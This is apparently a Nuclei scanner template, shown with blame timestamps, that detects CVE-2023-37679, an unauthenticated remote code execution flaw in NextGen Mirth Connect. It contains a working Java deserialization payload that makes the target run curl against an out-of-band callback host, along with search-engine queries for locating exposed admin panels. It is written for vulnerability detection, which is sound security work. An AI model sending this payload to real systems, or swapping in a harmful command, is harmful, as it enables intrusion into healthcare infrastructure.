nuclei-templates/http/cves/2023/CVE-2023-37679.yaml

79 lines
2.7 KiB
YAML
Raw Normal View History

id: CVE-2023-37679
2023-10-25 18:13:45 +00:00
info:
2023-10-25 18:13:45 +00:00
name: NextGen Mirth Connect - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability
reference:
- https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/
- https://nvd.nist.gov/vuln/detail/CVE-2023-37679
- http://mirth.com
- http://nextgen.com
2024-05-31 19:23:20 +00:00
- http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html
2023-10-25 18:13:45 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-37679
cwe-id: CWE-77
2024-05-31 19:23:20 +00:00
epss-score: 0.07052
epss-percentile: 0.9396
cpe: cpe:2.3:a:nextgen:mirth_connect:4.3.0:*:*:*:*:*:*:*
2023-10-25 18:13:45 +00:00
metadata:
verified: true
max-request: 2
vendor: nextgen
product: mirth_connect
shodan-query:
- title:"mirth connect administrator"
- http.title:"mirth connect administrator"
2024-05-31 19:23:20 +00:00
fofa-query: title="mirth connect administrator"
google-query: intitle:"mirth connect administrator"
tags: packetstorm,cve2023,cve,nextgen,rce
http:
- raw:
- |
GET /api/server/version HTTP/1.1
Host: {{Hostname}}
X-Requested-With: OpenAPI
- |
POST /api/users HTTP/1.1
Host: {{Hostname}}
X-Requested-With: OpenAPI
Content-Type: application/xml
<sorted-set>
<string>foo</string>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class="java.beans.EventHandler">
<target class="java.lang.ProcessBuilder">
<command>
<string>curl</string>
<string>http://{{interactsh-url}}/</string>
</command>
</target>
<action>start</action>
</handler>
</dynamic-proxy>
</sorted-set>
2023-10-25 18:13:45 +00:00
matchers:
- type: dsl
dsl:
- 'compare_versions(version, "<4.4.1")'
- 'contains(interactsh_protocol, "dns")'
- 'status_code_1 == 200 && status_code_2 == 500'
condition: and
extractors:
- type: regex
part: body_1
2023-10-25 18:13:45 +00:00
name: version
group: 1
regex:
- '(.*)'
2023-10-25 18:13:45 +00:00
internal: true
# digest: 490a004630440220575ada41e067b0063b7ad7058003ec029cfee0ca830bf8c18febb02c0933bfa502201d1566c2a59d49ef5a0289309769e0894ce341b208c868479d9b7a85b588aeed:922c64590222798bb761d5b6d8e72950